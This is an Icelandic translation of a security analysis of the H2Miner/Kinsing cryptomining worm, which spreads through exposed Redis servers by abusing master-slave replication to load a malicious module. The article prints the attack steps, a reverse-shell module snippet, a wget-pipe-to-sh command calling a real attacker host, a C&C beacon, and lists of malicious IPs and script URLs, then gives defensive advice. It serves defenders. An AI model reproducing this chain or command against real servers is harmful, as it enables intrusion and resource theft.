Fyrir degi síðan varð einn af netþjónum verkefnisins míns fyrir árás af svipuðum ormi. Í leit að svari við spurningunni "hvað var það?" Ég fann frábæra grein eftir Alibaba Cloud Security teymið. Þar sem ég fann ekki þessa grein á Habré ákvað ég að þýða hana sérstaklega fyrir þig <3
Færslu
Nýlega uppgötvaði öryggisteymi Alibaba Cloud skyndilega faraldur H2Miner. Þessi tegund af illgjarn ormur notar skort á heimild eða veik lykilorð fyrir Redis sem gátt að kerfum þínum, eftir það samstillir það sína eigin illgjarna einingu við þrælinn í gegnum samstillingu herra og þræls og hleður að lokum niður þessari skaðlegu einingu á vélina sem ráðist var á og keyrir skaðlega leiðbeiningar.
Áður fyrr voru árásir á kerfin þín fyrst og fremst gerðar með því að nota aðferð sem fól í sér tímasett verkefni eða SSH lykla sem voru skrifaðir á vélina þína eftir að árásarmaðurinn skráði sig inn á Redis. Sem betur fer er ekki hægt að nota þessa aðferð oft vegna vandamála með leyfisstýringu eða vegna mismunandi kerfisútgáfu. Hins vegar getur þessi aðferð við að hlaða illgjarnri einingu framkvæmt skipanir árásarmannsins beint eða fengið aðgang að skelinni, sem er hættulegt fyrir kerfið þitt.
Vegna mikils fjölda Redis netþjóna sem hýstir eru á netinu (tæplega 1 milljón), mælir öryggisteymi Alibaba Cloud, til vinsamlegrar áminningar, með því að notendur deili ekki Redis á netinu og athuga reglulega styrk lykilorða sinna og hvort þau séu í hættu. fljótlegt val.
H2Miner
H2Miner er námuvinnslunet fyrir Linux-undirstaða kerfi sem geta ráðist inn í kerfið þitt á margvíslegan hátt, þar á meðal skortur á heimild í Hadoop garni, Docker og Redis fjarstýringu (RCE) varnarleysi. Botnet virkar með því að hlaða niður skaðlegum forskriftum og spilliforritum til að ná í gögnin þín, stækka árásina lárétt og viðhalda stjórn og eftirliti (C&C) samskiptum.
Redis RCE
Þekkingu um þetta efni var miðlað af Pavel Toporkov á ZeroNights 2018. Eftir útgáfu 4.0 styður Redis hleðslueiginleika í viðbót sem gefur notendum möguleika á að hlaða svo skrám sem eru settar saman með C inn í Redis til að framkvæma sérstakar Redis skipanir. Þessi aðgerð, þótt gagnleg, inniheldur varnarleysi þar sem, í master-slave ham, er hægt að samstilla skrár við þrælinn með fullresync ham. Þetta getur verið notað af árásarmanni til að flytja skaðlegar svo skrár. Eftir að flutningnum er lokið hlaða árásarmennirnir einingunni inn á Redis tilvikið sem ráðist var á og framkvæma hvaða skipun sem er.
Malware ormagreining
Nýlega uppgötvaði Alibaba Cloud öryggisteymið að stærð H2Miner illgjarnra námuverkahóps hefur skyndilega aukist verulega. Samkvæmt greiningunni er almennt ferli árása sem hér segir:
H2Miner notar RCE Redis fyrir fulla árás. Árásarmenn ráðast fyrst á óvarða Redis netþjóna eða netþjóna með veikum lykilorðum.
Síðan nota þeir skipunina config set dbfilename red2.so til að breyta skráarnafni. Eftir þetta framkvæma árásarmennirnir skipunina slaveof til að stilla hýsilvistfang herra-þrælafritunar.
Þegar Redis-tilvikið sem ráðist er á kemur á master-slave tengingu við illgjarn Redis sem er í eigu árásarmannsins, sendir árásarmaðurinn sýktu eininguna með fullresync skipuninni til að samstilla skrárnar. Red2.so skránni verður síðan hlaðið niður á vélina sem ráðist var á. Árásarmennirnir nota síðan ./red2.so hleðslueininguna til að hlaða þessari so skrá. Einingin getur framkvæmt skipanir frá árásarmanni eða hafið öfuga tengingu (bakdyr) til að fá aðgang að vélinni sem ráðist var á.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Eftir að hafa framkvæmt illgjarn skipun eins og / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, mun árásarmaðurinn endurstilla heiti öryggisafritsskrárinnar og afferma kerfiseininguna til að hreinsa ummerkin. Hins vegar verður red2.so skráin enn áfram á vélinni sem ráðist var á. Notendum er bent á að fylgjast með tilvist slíkrar grunsamlegrar skráar í möppu Redis-tilviksins.
Auk þess að drepa suma illgjarna ferla til að stela auðlindum fylgdi árásarmaðurinn illgjarnri skriftu með því að hlaða niður og keyra skaðlegar tvíundarskrár til . Þetta þýðir að ferli nafnsins eða skráarnafnið sem inniheldur kinsing á hýsilinn gæti bent til þess að þessi vél hafi verið sýkt af þessum vírus.
Samkvæmt öfugum verkfræðiniðurstöðum framkvæmir spilliforritið aðallega eftirfarandi aðgerðir:
- Að hlaða upp skrám og framkvæma þær
- Námuvinnsla
- Viðhalda C&C samskiptum og framkvæma árásarskipanir
Notaðu masscan fyrir ytri skönnun til að auka áhrif þín. Að auki er IP-tala C&C þjónsins harðkóðað í forritinu og gestgjafi sem ráðist er á mun hafa samskipti við C&C samskiptaþjóninn með því að nota HTTP beiðnir, þar sem upplýsingar um zombie (miðlara í hættu) eru auðkenndar í HTTP hausnum.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Aðrar árásaraðferðir
Heimilisföng og tenglar sem ormurinn notar
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Ábending
Í fyrsta lagi ætti Redis ekki að vera aðgengilegt af internetinu og ætti að vera varið með sterku lykilorði. Það er líka mikilvægt að viðskiptavinir athugi að það sé engin red2.so skrá í Redis möppunni og að það sé engin „kinsing“ í skráar-/ferlisnafninu á hýslinum.
Heimild: www.habr.com